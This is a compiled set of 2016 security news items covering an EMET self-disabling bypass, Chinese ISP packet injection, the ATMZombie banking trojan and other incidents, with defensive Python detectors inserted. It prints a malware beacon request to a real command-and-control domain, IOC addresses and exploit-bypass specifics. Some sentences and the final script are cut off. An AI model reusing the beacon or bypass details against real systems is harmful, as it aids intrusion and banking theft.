Using the Microsoft EMET security tool to hack itself
29.2.2016 Security
The security researchers at FireEye Abdulellah Alsaheel and Raghav Pande have found a way to exploit Microsoft EMET (Enhanced Mitigation Experience Toolkit) to hack itself.
The security researchers at FireEye Abdulellah Alsaheel and Raghav Pande have found a way to exploit the Microsoft security tool Enhanced Mitigation Experience Toolkit to hack itself. The Enhanced Mitigation Experience Toolkit was introduced by Microsoft to raise the cost of exploit development; it cannot be considered a solution able to protect systems from any malicious exploit.
The experts elaborated a technique to disable the Microsoft Enhanced Mitigation Experience Toolkit using the tool itself.
The Enhanced Mitigation Experience Toolkit was designed to protect systems against attackers by identifying patterns of cyber attacks.
“EMET anticipates the most common actions and techniques adversaries might use in compromising a computer, and helps protect by diverting, terminating, blocking, and invalidating those actions and techniques. EMET helps protect your computer systems even before new and undiscovered threats are formally addressed by security updates and antimalware software.” is the description provided by Microsoft for its tool.
The Enhanced Mitigation Experience Toolkit works by injecting an anti-malware library into applications in an attempt to detect suspicious activity early, hooking the running process and analyzing any calls to critical APIs.
“EMET injects emet.dll or emet64.dll (depending upon the architecture) into every protected process, which installs Windows API hooks (exported functions by DLLs such as kernel32.dll, ntdll.dll, and kernelbase.dll). These hooks provide EMET the ability to analyze any code calls in critical APIs and determine if they are legitimate. If code is deemed to be legitimate, EMET hooking code jumps back into the requested API. Otherwise it triggers an exception.” wrote the security duo.
The researchers focused their efforts on disabling the Enhanced Mitigation Experience Toolkit; this means that an attacker could include in his application code that invokes a function within the tool that disables it.
The exit “feature” is implemented in emet.dll for cleanly exiting from a process.
“However, there exists a portion of code within EMET that is responsible for unloading EMET. The code systematically disables EMET’s protections and returns the program to its previously unprotected state. One simply needs to locate and call this function to completely disable EMET. In EMET.dll v5.2.0.1, this function is located at offset 0x65813. Jumping to this function results in subsequent calls, which remove EMET’s installed hooks.”
The only problem for the researchers was to retrieve the base address of emet.dll in order to invoke the function that stops it. The experts used the GetModuleHandleW function, which is not hooked by the Microsoft Enhanced Mitigation Experience Toolkit, to retrieve the address.
This is not the first time that security experts have found a way to bypass the Enhanced Mitigation Experience Toolkit, but unlike earlier bypasses, the technique proposed by the duo doesn’t rely on vulnerabilities or missing features.
“This new technique uses EMET to unload EMET protections. It is reliable and significantly easier than any previously published EMET disabling or bypassing technique. The entire technique fits within a short, straightforward ROP chain. It only needs to leak the base address of a DLL importing GetModuleHandleW (such as mshtml.dll), instead of full read capabilities over the process space. Since the DllMain function of emet.dll is exported, the bypass does not require hard-coded version-specific offsets, and the technique works for all tested versions of EMET (4.1, 5.1, 5.2, 5.2.0.1).” explained the security duo.
Chinese ISPs are redirecting users legitimate traffic to malicious sites/ads
29.2.2016 Virus
Chinese ISPs (internet service providers) are redirecting users’ legitimate traffic to malicious websites serving malware and ads.
China is known to be not very “orthodox” when it comes to freedom on the internet; over time it has developed numerous projects to monitor users’ activity, such as the Great Firewall.
Now three Israeli researchers uncovered that Chinese ISPs (China Telecom and China Unicom) are injecting content into the users’ traffic.
The way these two Chinese ISPs pollute their clients’ network traffic is by setting up proxy servers that lead clients to advertisement links and malware.
When a user accesses a domain served through one of these Chinese ISPs, the altered packet redirects the user’s browser along the rogue network routes. The result is that the initial traffic is redirected to malicious sites serving advertisements and malware.
In their paper, the researchers detailed the tactics used to conduct this kind of attack and how the ISPs monitor network traffic for specific URLs and alter it.
The ISPs are using two injection techniques: the first is called Out of Band TCP Injection and the second is HTTP Injection.
In Out of Band TCP Injection, the network operator sends a forged packet without dropping the legitimate one; in effect the ISP clones the legitimate traffic and sends both the legitimate and the cloned traffic to the final destination.
The destination receives two traffic streams coming from the same source, the legitimate one and the cloned one, but only one can arrive first: if the legitimate one wins the race nothing happens and the user is fine, but if the cloned one wins the race the user is in serious trouble.
HTTP Injection works by injecting false HTTP responses into the web client. HTTP is a stateless client-server protocol that uses TCP as its transport.
An HTTP exchange begins by a client sending an HTTP request, usually to retrieve a resource indicated by a URI included in the request. After processing the request, the server sends an HTTP response with a status code. The user might get the following responses:
200 (Successful): The request was successfully received, understood, and accepted. Responses of this type will usually contain the requested resource.
302 (Redirection): The requested resource resides temporarily under a different URI. Responses of this type include a Location header field containing the different URI.
“An HTTP client will receive only one HTTP response for a given request even when a false HTTP response is injected because, as mentioned above, the TCP layer will only accept the first segment that it receives.”
The researchers collected evidence to discover the threat actor behind the forged packets.
They discovered a sort of dirty alliance between advertising sites and ISPs that, working together, can generate huge amounts of advertising revenue and divide the profit.
During the investigation, the researchers detected massive amounts of traffic being redirected based on this partnership.
Even though this is happening in China, all users in the world can be affected by it, simply because if you want to access websites hosted in China your traffic must pass through Chinese ISPs before reaching the website, and it is susceptible to being injected with ads or malware.
How to detect traffic changed/cloned by the Chinese ISPs?
IP identification
A forged packet masquerades as a legitimate packet, but the time stamp in each packet can expose it, providing evidence that it is a rogue packet.
“We formulate the following rule to determine which of the two raced packets is the forged one: the forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets (except the raced one).”
TTL (Time to Live)
“The IP TTL value in a received packet is dependent on the initial value set by the sender and the number of hops the packet has traversed so far. Thus, it is unusual for packets of the same session to arrive at the client with different TTL values. Therefore, if the raced packets have different TTL values we can use them to distinguish between the two packets. From our observations, the injecting entity often made no attempt to make the TTL value of the forged packet similar to the TTL values of the other packets sent by the server. Similarly to the case of the IP identification rule above, we identify the forged packet using the following rule: the forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets (except the raced one).”
Timing Analysis
“The race between the forged and legitimate packets can also be characterized by the difference in their arrival times. By arrival time we mean the time at which the packet was captured by the monitoring system. Since the system captures traffic at the entrance to the edge network close to the client, it is reasonable to assume that these times are very close to the actual arrival times at the end client. For each injection event we calculate the difference between the arrival time of the legitimate packet and the arrival time of the forged packet. A negative difference means that the forged packet “won” the race, and a positive difference means that the legitimate packet “won”.”
How to mitigate the risk?
The best way to avoid this kind of attack is to access websites that support HTTPS, because in general the malicious URLs are not protected by SSL; therefore the use of HTTPS by a website can block this type of attack.
ATMZombie: banking trojan in Israeli waters
29.2.2016 Source: Kaspersky Virus
In November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. It uses insidious injection and other sophisticated and stealthy methods. The first method, dubbed “proxy-changing”, is commonly used for HTTP packet inspection. It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.
Although this is efficient for testing, streaming bank details isn’t as easy. Banks are using encrypted channels, signed with authorized certificates, to prevent the data from being streamed in clear-text. The attackers, however, realized the missing piece and have since issued a certificate of their own, which is embedded in the dropper and is inserted in the root CA list of common browsers in the victim’s machine.
The method of using a “proxy-changer” Trojan to steal bank credentials has been around since the end of 2005, and is being actively used by Brazilian cybercriminals; however, it wasn’t until 2012 that Kaspersky Lab researchers compiled a full attack analysis. “In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.“, said Fabio Assolini, Senior Security Researcher at GReAT Kaspersky Lab, in his article.
A Kaspersky Lab researcher based in Russia had written about a similar Trojan attacking PSB-retail customers, dubbed Tochechnyj Banker. It was even backed by a victim case study, where the victim explains how the crooks fooled him into handing out his credentials.
The incident Israeli banks experienced had the same characteristics, but had a very fascinating and innovative method of stealing the money. Instead of relying only on direct wire-transfer or trading credentials, their modus operandi started by leveraging a loophole in one of the bank’s online features; and later by physically withdrawing money from the ATM, assisting money mules (zombies) who are suspected to have no awareness of how the attack works; hence the Trojan was dubbed – ATMZombie.
The threat actor seems to be widely active in banking malware campaigns, as he was found to be registering domains for the following Trojans as well: Corebot, Pkybot and the recent AndroidLocker. However, none uses the same modus operandi. In addition, the actor is being tracked by a number of researchers and also runs rogue online services such as malware encryption and credit card dumps for sale.
Similar to the PSB-retail attack in 2012, the Retefe Banking Trojan, discovered by Palo Alto Networks last August, is quite like a big brother of ATMZombie. It contains an additional Smoke Loader backdoor, which ATMZombie lacks. The other similar banker is the one identified by IBM Trusteer as Tsukuba.
The proxy configurations file must specifically detail the targets it is aiming at, thus it was fairly easy to spot them. The attack had successfully compromised hundreds of victim machines; however Kaspersky Lab was able to trace only a couple of dozen of them.
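Because a proxy-changer's PAC file has to name the sites it diverts, a defender can triage a suspicious PAC by pulling out the targeted hosts and the proxy they are sent to. The script below is an added example, not Kaspersky's tooling; SAMPLE_PAC and its proxy address (from the RFC 5737 documentation range) are constructed.

```python
"""Triage of a proxy-changer PAC file: which hosts it diverts, and to where.
Added example, not Kaspersky's tooling. SAMPLE_PAC and the proxy address
(RFC 5737 documentation range) are constructed."""
import ipaddress
import re

SAMPLE_PAC = """function FindProxyForURL(url, host) {
  if (shExpMatch(host, "*.example-bank.co.il")
      || dnsDomainIs(host, "login.example-bank.co.il")
      || host == "secure.other-bank.example")
    return "PROXY 198.51.100.10:8080";
  return "DIRECT";
}"""

# The hostname tests a PAC author can use to single out specific sites.
HOST_PATTERNS = [
    re.compile(r'shExpMatch\(\s*host\s*,\s*"([^"]+)"\s*\)'),
    re.compile(r'dnsDomainIs\(\s*host\s*,\s*"([^"]+)"\s*\)'),
    re.compile(r'host\s*==\s*"([^"]+)"'),
]
PROXY_RE = re.compile(r'return\s+"PROXY\s+([^";\s]+)')
_RFC1918 = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(proxy):
    """True unless the proxy is an RFC 1918 address: a corporate PAC normally
    points at an internal proxy, a banker's PAC points out to the attacker."""
    host = proxy.rsplit(":", 1)[0]
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True  # a hostname: cannot tell, treat as external for triage
    return not any(ip in net for net in _RFC1918)


def triage_pac(text):
    """Extract targeted hosts and proxy endpoints, and flag the combination
    seen in proxy-changer bankers: named hosts routed to an external proxy."""
    targets = sorted({m for rx in HOST_PATTERNS for m in rx.findall(text)})
    proxies = sorted(set(PROXY_RE.findall(text)))
    suspicious = bool(targets) and any(is_external(p) for p in proxies)
    return {"targets": targets, "proxies": proxies, "suspicious": suspicious}


if __name__ == "__main__":
    print(triage_pac(SAMPLE_PAC))
```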
Bird view
The Trojan is dropped onto the victim’s machine and starts the unpacking process. Once unpacked, it stores certificates in common browsers (Opera, Firefox) and modifies their configurations to match a Man-In-The-Middle attack. It eliminates all possible proxies other than the malware’s and changes cache permissions to read-only. It then continues by changing registry entries with Base64 encoded strings that contain a path to the auto-configuration content (i.e. traffic capture conditions using CAP file syntax) and installs its own signed certificate into the root folder. Later it waits for the victim to login to their bank account and steals their credentials, logs in using their name and exploits the SMS feature to send money to the
Analysis
After loading the malware executable with your favorite assembler level analysis debugger, it is possible to capture the virtual allocation procedure occurring in run-time. Putting breakpoints in the right instruction points will disclose the unpacked executable. Once the final routine is done, the MZ header will appear in memory. There are many techniques and tools, but this method was enough to unpack the malware.
Looking into the malware assembly code, we were able to identify a number of strings that were embedded in the data section for a reason. The first we spotted was a Base64 string containing a chunk of an outbound communication URL, meant to be embedded in a number of registry entries.
The string decodes to:
http://retsback.com/config/cfg.pac
Side note: It is not the PAC file that is being embedded in the browser network configuration; thus we believe that it was generated by the attacker as a backup, in case the original PAC fails.
Two other Base64 strings we found were the PAC, which was embedded in the browser network configuration; and another type of URL, which indicated the type of lateral movement the threat actor chose.
The URL in the Base64 string was appended to an HTTP request which was detected as an attempt to fingerprint the sandbox. The empty parameters are fed with the Windows ProductID, the binary’s name and an integer between one and five. The integer is the level of integrity that the malware was assigned for; where (1) is untrusted level and (5) is system level. Along with those three dynamic values is a static version value.
GET /z/rtback.php?id=[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1
Host: retsback.com
Cache-Control: no-cache
Inspecting the binary, we found that it uses a certificate to stream data over HTTPS and securely steal the victim’s credentials.
After embedding the above certificate and proxy configurations in the victim’s machine, the browser is set to route the communication via the attackers’ server when the victim decides to login to his bank.
The victim was not only lured into downloading the malware for being a client of Israeli banks, but was also targeted for being a client of a specific bank in Israel. This requires either very good intelligence-gathering techniques or an insider that can, legitimately or not, get a hold of the list of clients. When a list of that nature is being assembled, the hunt becomes very efficient and the attackers are able to craft each email or link to a specific victim or bank.
The following is a full pseudo code of the malware:
Stepping out of the rabbit hole
The malware is only the first step of the attack. The second step involves a manual login to the hijacked accounts and submission of a wire-transfer to the account of the money mule. This is a crucial step, since crossing this step means that the malware has successfully finished its role in the attack.
Logging manually into the victim’s bank account is not something to take lightly. Many banks around the world are fingerprinting devices to make sure that the user is logging in from a trusted machine. For untrusted machines, the bank will issue extended protection mechanisms to prevent the exact attack detailed in this article. In addition, banks track anomalies and send alerts to its information security personnel.
Before victims get to the phase where they call the bank’s support team to declare that money has gone missing, the attacker issues a money transfer to the money mule’s cell phone number and Israeli Personal Identifiable Information (PII). We dubbed the money mule “Zombie” as part of an investigation which found that youngsters were lured into withdrawing cash from the ATMs in return for keeping a small amount of it. Later, they sent the rest of the money via different media, such as a post office. The campaign was named after the money mules and the technique they were instructed to use.
The technique allowed the attackers to stay anonymous and supervise the entire campaign remotely. It also points to a new type of attack, where attackers control residents of a country to operate as an insider and deliver a basic service. This service might cause its executor to be accused for committing a crime; however, the chance of proving that they were aware of the entire operation is close to none. After all, they are not doing anything malicious.
From reading the bank’s instructions, a non-registered user can study the five-year-old feature and analyze the possibility of including it in the attack as a way to wire money. This feature is called “SMS transaction”; it has been widely used for the past few years, allowing parents, for example, to send money to kids who have no credit card while they serve in the military or study at school.
Along with a few more unique details, such as Date, Israeli ID, Name and Amount, the owner of the phone is provided with an SMS message that authorizes the cash withdrawal.
Kaspersky Lab found an innovative way to protect against the proxy-changer that has existed for several years. It can be found here.
Israeli banks involved in the incident successfully stopped the attack using, among other data, the information they received from Kaspersky Lab regarding the attacker, the malicious activity and the victims.
FAQs
Q: Was the attack targeted at Israeli banks?
A: Yes
Q: Was money stolen from the banks or from victims’ accounts?
A: The money was stolen from victims’ accounts, but the bank compensated each victim. In conclusion, the bank was the one to lose revenue.
Q: Was the attack stopped completely?
A: As far as we know, the banks were able to stop the attack completely and compensate the victims.
Q: How many victims were in the attack?
A: The Kaspersky Security Network (KSN) showed dozens of victims; however, we estimate that the total number of victims reached a couple of hundreds.
Q: How much money was stolen?
A: The highest amount for one transaction was approximately $750. We were able to find a number of money mules, about 10 different malicious binaries, and a number of banks who were victims of this attack. With this information we estimate that hundreds of thousands of dollars were stolen in this short period of time. If not for the vast investigation led, among others, by Kaspersky Lab, the amounts stolen could have soared to much larger numbers.
Q: Were the police part of the investigation?
A: We are not aware of any investigation details.
Q: In regards to attribution, who is the attacker?
A: Kaspersky Lab does not seek attribution; however, the company’s researchers have sent all the information to law enforcement to help in catching the criminals behind the campaign.
Q: What can I do to stay protected?
A: Make sure you have an anti-malware product installed and install the latest patches.
IPs
91.230.211.206
185.86.77.153
91.215.154.90
88.214.236.121
Domains
retsback.com
updconfs.com
systruster.com
msupdcheck.com
Samples
The new FighterPOS PoS Malware implements worm capabilities
29.2.2016 Virus
The threat actors behind the FighterPOS PoS malware have added worm capabilities to their malicious code that is now targeting systems in the United States.
PoS malware represents a serious threat to several industries, from retail to the hotel industry. During the last twelve months, security experts have discovered a significant number of payment card frauds involving PoS malware. PoS malware is a very effective weapon in the arsenal of cyber criminals.
In April 2015, security experts at Trend Micro discovered a new family of PoS malware, dubbed FighterPOS, that infected the systems of more than 100 organizations in Brazil allowing crooks to steal more than 22,000 unique credit card records.
FighterPOS was offered for sale for more than $5,000 worth of Bitcoin. It is now also spreading outside Brazil: researchers at Trend Micro reported that the number of infections in the US now represents 6 percent of the total, up from 1 percent reported in April 2015.
Cyber criminals have started targeting the United States, the researchers detected new samples of the FighterPOS malware that include strings written in English, instead of Portuguese used in Brazil.
“It is also interesting to note that based on the analysis of their code, the new FighterPOS samples have strings of code written in English, instead of Portuguese. This leads us to speculate that whoever is behind the new versions are operating in English-speaking countries, and are shifting to target other countries like the United States. ” states the analysis published by TrendMicro.
The malware researchers discovered two new strains of the FighterPOS malware, called TSPY_POSFIGHT.F and WORM_POSFIGHT.SMFLK. WORM_POSFIGHT.SMFLK, also known as “Floki Intruder,” is more sophisticated than TSPY_POSFIGHT.F: it has the ability to disable the firewall, User Account Control (UAC) and other Windows protections, and it is able to detect the presence of security products using Windows Management Instrumentation (WMI).
The lightweight FighterPOS variant, the TSPY_POSFIGHT.F, doesn’t act as a backdoor and is not able to receive commands. It has been designed to send back to C&C the payment card logs collected by other PoS malware.
The Floki Intruder is spread through websites compromised by attackers, it could be updated receiving packages from the command and control (C&C) servers.
The most interesting improvement in the new strain of the FighterPOS malware is the implementation of worm capabilities. The Floki Intruder variant is able to locate other PoS systems on the same network and infect them. The malware enumerates logical drives and drops copies of itself along with an autorun.inf file using WMI. The autorun.inf allows the execution of the malware when the logical drive is accessed.
“Perhaps the most notable update Floki Intruder has from FighterPOS is that it is able to enumerate logical drives to drop copies of itself and an autorun.inf by using WMI. Adding this routine, in a way, makes sense: given that it is quite common for PoS terminals to be connected in one network, a propagation routine will not only enable the attacker to infect as many terminals as possible with the least amount of effort, it will also make this threat more difficult to remove because reinfection will occur as long as at least one terminal is affected.” states the analysis.
A journalist has been hacked on a plane while writing an Apple-FBI story
29.2.2016 Apple
The journalist Steven Petrow had his computer hacked while on a plane, it was a shocking experience that raises the discussion on privacy.
Experts in the aviation industry are spending significant effort on improving cyber security. The news that I’m going to tell you is quite incredible.
The American journalist and author Steven Petrow, who now writes for USA Today, explained that he was contacted by a fellow passenger on an American Airlines flight from North Carolina to Dallas, who told him that he had accessed his email account.
“I don’t really need to worry about online privacy,” wrote Petrow. “I’ve got nothing to hide. And who would want to know what I’m up to, anyway?”
Petrow is a journalist, not an investigative reporter and is not involved in any specific investigation, so the interest of the alleged hacker appeared very strange to him.
Petrow was writing an article on the “Apple vs FBI” case while he was on the plane, but another passenger was well informed about the work of the journalist.
After the plane landed, the journalist was leaving the plane when a fellow in the same row asked to speak with him.
“I need to talk to you.” the man said. “You’re a reporter, right?” “Wait for me at the gate.”
The journalist waited for the fellow passenger and, when he met him at the gate, asked him to explain.
“How did you know I was a reporter?” the journalist asked.
“Are you interested in the Apple/FBI story?” replied the man, ignoring the question.
“I hacked your email on the plane and read everything you sent and received. I did it to most people on the flight.”
As proof of the hack, the fellow passenger cited the exact content of one of the emails he had received while in flight.
“One of my emails was pretty explicit about the focus of my story and I had emailed Bruce Schneier, a security expert who had previously written in the Washington Post about this very issue.” wrote Petrow.
During the flight, Petrow worked on the article and sent and received several email messages through the American Airlines Gogo in-flight Internet connection.
The Gogo wireless is American Airlines’ free internet service provided to passengers. Passengers who use it are advised to avoid transmitting sensitive data, but most of them still ignore the risks.
The Gogo service operates in the same way as most open Wi-Fi hotspots, which means it is important to avoid sharing sensitive data while using it, just as on the ground.
Gogo recommends the use of a virtual private network for sending sensitive data, but of course the journalist ignored this best practice.
The fellow passenger explained to the journalist the risks of connecting to open networks.
“That’s how I know you’re interested in the Apple story,” he continued. “Imagine if you had been doing a financial transaction. What if you were making a date to see a whore?”
“That’s why this story is so important to everyone,” he told Petrow. “It’s about everyone’s privacy.”
The man then went away, but the event upset the reporter. His privacy had been violated, the same thing that happens every day to millions of unaware users.
“For me, I felt as though the stranger on the plane had robbed me of my privacy—as was explicitly his intent. He took the decision of what to share out of my hands. He went in through the back door of the Gogo connection.”
A DHS report confirms the use of BlackEnergy in the Ukrainian outage, still unknown its role
28.2.2016 Hacking
A report issued by the DHS CERT confirms that the outage in Ukraine was caused by a well-coordinated attack, but the role of BlackEnergy is still unclear.
In December, a major outage hit a region in Ukraine; more than 225,000 customers were affected by the interruption of electricity. Security experts speculate on the involvement of Russian nation-state actors who used BlackEnergy to infect SCADA systems of the Ukrainian grid and critical infrastructure.
According to the Ukrainian media outlet TSN, the power outage was caused by destructive malware that disconnected electrical substations. The experts speculate that hackers ran a spear phishing campaign against the Ukrainian power authorities to spread the BlackEnergy malware using Microsoft Office documents.
Now a new report published by the DHS Industrial Control Systems Cyber Emergency Response Team confirms that the outage was caused by a cyber attack.
The report is based on interviews with operations and IT staff at six Ukrainian organizations involved in the attacks. The thesis was first supported by the SANS industrial control systems team, but the real impact of the BlackEnergy malware on the incident is still unclear.
The SANS report reported that attackers flooded the call centers at the power authorities with phone calls, the intent of the attackers was to prevent customers from reporting the incident to the companies operating the critical infrastructure.
The DHS report highlights the possibility that the two strains of malware were used by the attackers after the outage in an attempt either to destroy evidence of the intrusion or to make recovery more difficult.
“Following these discussions and interviews, the team assesses that the outages experienced on December 23, 2015, were caused by external cyber-attackers. The team was not able to independently review technical evidence of the cyber-attack; however, a significant number of independent reports from the team’s interviews as well as documentary findings corroborate the events as outlined below.” states the report.
“Through interviews with impacted entities, the team learned that power outages were caused by remote cyber intrusions at three regional electric power distribution companies (Oblenergos) impacting approximately 225,000 customers.”
“The cyber-attack was reportedly synchronized and coordinated, probably following extensive reconnaissance of the victim networks. According to company personnel, the cyber-attacks at each company occurred within 30 minutes of each other and impacted multiple central and regional facilities. During the cyber-attacks, malicious remote operation of the breakers was conducted by multiple external humans using either existing remote administration tools at the operating system level or remote industrial control system (ICS) client software via virtual private network (VPN) connections. The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access.
All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. In addition, the actors reportedly scheduled disconnects for server Uninterruptable Power Supplies (UPS) via the UPS remote management interface. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts.”
The report confirmed that every company hit by the attack was infected with the BlackEnergy malware, but avoided providing further details on the role played by the malware.
“Each company also reported that they had been infected with BlackEnergy malware; however, we do not know whether the malware played a role in the cyber-attacks. The malware was reportedly delivered via spear phishing emails with malicious Microsoft Office attachments. It is suspected that BlackEnergy may have been used as an initial access vector to acquire legitimate credentials; however, this information is still being evaluated. It is important to underscore that any remote access Trojan could have been used and none of BlackEnergy’s specific capabilities were reportedly leveraged.”
German authorities approve the use of home-made Federal Trojan
28.2.2016 Virus
The German Interior Ministry has approved the use of a federal Trojan developed by the German Federal Criminal Police.
The German Interior Ministry has approved the use of spyware developed by the German Federal Criminal Police (BKA), the so-called 'federal Trojan' or Bundestrojaner, for investigative purposes.
“Soon the state could once again enter the computers of suspicious citizens. The Bundeskriminalamt has developed its own Trojan horse, which should receive approval for use in the coming weeks, as Deutschlandfunk has confirmed. The Chaos Computer Club and the Greens remain skeptical about whether the new software meets the requirements of the Federal Constitutional Court.” reports Deutschlandfunk.
The BKA completed development of the malware in autumn 2015. It allows investigators to intercept suspects’ phone calls, emails and chats and to access files and sensitive data stored on their devices. The federal Trojan can also record video or audio from the surrounding environment.
The authorities can now use the federal Trojan under a court order; the spyware may be used in investigations of individuals involved in crimes threatening citizens’ “life, limb or liberty.”
Experts from the Chaos Computer Club (CCC) expressed concern about the federal Trojan; Frank Rieger, a spokesman for the organization, highlighted the malware’s ability to set up video or audio surveillance.
In 2011, the CCC analyzed an earlier sample of a state Trojan. The experts discovered that the spyware could install a backdoor on the suspect’s machine and spy on the surrounding environment via camera and microphone. The interior ministers of several German states admitted using the malware and explained that the sample analyzed by the CCC was a beta version of spyware created by the German firm DigiTask. The spyware was rejected by the authorities because it implemented many surveillance functions rather than only telecommunication surveillance.
The CCC argues that the so-called federal Trojan is dangerous for citizens: innocent users could easily become victims of the surveillance operated by the authorities.
Another aspect highlighted by privacy advocates is how such malware is deployed: to compromise suspects’ devices, its authors need access to zero-day exploits, which implies that the authorities will withhold knowledge of those vulnerabilities from the IT community, putting citizens at risk.
Deutschlandfunk also confirmed that German police use other spyware as well, including the infamous FinFisher malware developed by Gamma International.
“The Bundeskriminalamt had, in parallel to its own development, also ordered software from a controversial company for source telecommunication surveillance. According to the BKA, the adaptation of the FinFisher product from the German-British company Elaman / Gamma International is not yet complete, but is to be pursued following the in-house development.” states Deutschlandfunk.
Chinese ISPs Caught Injecting Ads and Malware into Web Pages
27.2.2016 Virus
China has attracted considerable global attention for its Internet policies in recent years, whether for its own search engine Baidu, the Great Firewall of China, its homebrew China Operating System (COS), and more.
Alongside these developments, China has long been criticized for suspected backdoors in its products; the Xiaomi and Star N9500 smartphones are prominent examples.
Now, Chinese Internet Service Providers (ISPs) have been caught red-handed injecting advertisements as well as malware into their network traffic.
Three Israeli researchers found that major Chinese ISPs, including China Telecom and China Unicom, two of Asia's largest network operators, have been engaged in the practice of injecting false content into network traffic.
The ISPs set up servers that pollute clients' traffic, not only with advertisements but in some cases with links to malware, inside the web pages they visit.
When a user requests a page that traverses these ISPs' networks, a forged response packet can reach the browser before the genuine one; the browser then follows the forged response, and the client's legitimate traffic is redirected to ad or malware sites that benefit the ISPs.
Here's How Malware and Ads are Injected
In the research paper titled 'Website-Targeted False Content Injection by Network Operators,' the Israeli researchers wrote that the tactic has spread to core ISPs, the operators that interconnect edge ISPs with the rest of the Internet.
These ISPs have set up specialized servers that monitor traffic for specific URLs and alter it, regardless of whether the end users are their own customers.
Methods of Injection:
The ISPs adopted various methods to tamper with legitimate traffic. Some of them are:
1) Out-of-band TCP injection
Unlike in-band tampering, where the ISP modifies packets as they pass through, out-of-band injection leaves the legitimate packets untouched and sends additional forged packets alongside them.
Rather than intercepting or rewriting packets in flight, the injector observes the client's request, produces a modified clone of the HTTP response, and sends it too, so the client ends up with both the clone and the original.
Two responses thus arrive for a single request, and the forged one has to win the race against the legitimate packet, which reaches the client later.
Because the forged copy does not always arrive before the legitimate one, injection succeeds only intermittently, which makes it harder to detect.
A careful capture with a tool such as netsniff-ng, however, shows both copies, and the heuristics below identify the fake one.
2) HTTP injection
HTTP is a stateless client-server protocol that uses TCP as its transport. TCP delivers the first segment it receives for a given sequence number and discards a later duplicate, so if the forged segment wins the race, the client processes the forged content and silently drops the genuine response.
In that case the user receives an HTTP 302 (redirect) response instead of the server's HTTP 200 (OK), and the browser is sent to an illegitimate URL.
How to Identify Rogue Packets?
1) IP identification
In many IP stacks the identification field is a counter incremented for every packet sent, so consecutive packets of one flow carry consecutive values.
The forged packet originates from a different host (the injector), so its identification value does not fit the sequence of the legitimate packets in the same flow.
The forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets.
2) TTL (Time to Live)
Each packet carries a TTL value set by the sender and decremented by every router it passes, so the value on arrival reflects the number of hops between sender and receiver.
If a packet arrives with a TTL that differs from the rest of the flow, it travelled a different path, which separates the legitimate packets from the forged one.
The forged packet is the one that has the largest absolute difference between its TTL value and the average of the TTL values of all the other packets.
3) Timing analysis
Timestamps of packets captured by a monitoring system at the entrance to the edge network can also reveal the forgery.
Legitimate packets of a flow arrive with consistent spacing; the forged packet, which must beat the genuine response to be effective, arrives out of step with that pattern.
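The three heuristics above can be combined into a small passive detector. The following is an added example in Python (not code from the paper or from the page): it takes the server-to-client segments of one captured HTTP flow, finds pairs of segments that share a TCP sequence number but carry different data (the trace an out-of-band injection leaves), and lets the IP ID, TTL and timing heuristics vote on which copy is the forgery. The Segment records, the flow values and the ads.invalid redirect target are constructed for the demonstration; in practice they would be read from a pcap.

```python
from dataclasses import dataclass
from statistics import mean
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Segment:
    """One server->client TCP segment as recorded by a passive monitor
    (in a real deployment these fields come from a pcap; here they are constructed)."""
    seq: int        # TCP sequence number
    ip_id: int      # IP identification field
    ttl: int        # IP time-to-live as received
    t: float        # capture timestamp, seconds
    payload: bytes  # TCP payload (start of the HTTP response)


def race_pairs(flow: List[Segment]) -> List[Tuple[int, int]]:
    """Indexes of two segments that share a sequence number but differ in
    payload: the signature of out-of-band injection, where the forged copy
    and the genuine response both reach the monitor."""
    by_seq: Dict[int, List[int]] = {}
    for i, s in enumerate(flow):
        by_seq.setdefault(s.seq, []).append(i)
    pairs: List[Tuple[int, int]] = []
    for idxs in by_seq.values():
        for k, a in enumerate(idxs):
            for b in idxs[k + 1:]:
                if flow[a].payload != flow[b].payload:
                    pairs.append((a, b))
    return pairs


def deviation(flow: List[Segment], i: int, field: str) -> float:
    """|field of segment i - mean of that field over all other segments|,
    the statistic the IP ID and TTL heuristics use."""
    others = [getattr(s, field) for j, s in enumerate(flow) if j != i]
    return abs(getattr(flow[i], field) - mean(others))


def suspect_by(flow: List[Segment], pair: Tuple[int, int], field: str) -> Optional[int]:
    """The member of the pair whose field deviates more from the flow; None on a tie."""
    a, b = pair
    da, db = deviation(flow, a, field), deviation(flow, b, field)
    if da == db:
        return None
    return a if da > db else b


def classify(flow: List[Segment]) -> List[dict]:
    """For every race pair, let the three heuristics vote and name the forged segment."""
    verdicts = []
    for pair in race_pairs(flow):
        votes: Dict[int, int] = {}
        for field in ("ip_id", "ttl"):
            s = suspect_by(flow, pair, field)
            if s is not None:
                votes[s] = votes.get(s, 0) + 1
        # Timing: the forged copy only has effect if it wins the race, so the
        # earlier arrival of the pair is the suspect (assumption: the monitor
        # sits near the client, where the race is decided).
        earlier = min(pair, key=lambda i: flow[i].t)
        votes[earlier] = votes.get(earlier, 0) + 1
        forged = max(votes, key=lambda i: votes[i])
        verdicts.append({
            "pair": pair,
            "forged": forged,
            "votes": votes,
            "status_line": flow[forged].payload.split(b"\r\n", 1)[0],
        })
    return verdicts


# Constructed sample: a four-segment legitimate response (incrementing IP ID,
# TTL 52) plus one injected HTTP 302 that reuses the first sequence number and
# arrives 4 ms ahead of the real first segment.
SAMPLE_FLOW = [
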